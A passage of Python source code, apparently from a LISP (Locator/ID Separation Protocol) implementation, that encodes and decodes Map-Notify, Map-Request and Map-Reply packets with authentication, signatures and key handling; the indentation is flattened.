self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return([None, None])
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify():
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
class lisp_map_request():
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
lprint(" itr-rloc: afi {} {}{}".format(itr.afi,
red(itr.print_address_no_iid(), False),
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data)
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 2)
json_len = socket.htons(len(json_string))
packet += struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0,
lcaf_len, json_len)
packet += json_string
packet += struct.pack("H", 0)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 2): return(None)
#
# Pull out JSON string from packet.
#
try:
json_string = json.loads(packet[0:json_len])
except:
return(None)
#endtry
packet = packet[json_len::]
#
# Get JSON encoded afi-address in JSON, we are expecting AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
#
# Store JSON data internally.
#
if (json_string.has_key("source-eid") == False): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if (json_string.has_key("signature-eid") == False): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if (json_string.has_key("signature") == False): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f) + 1
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
while (self.itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = socket.ntohs(afi)
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
else:
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
packet = packet[format_size::]
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
if (len(packet) < format_size): return(None)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
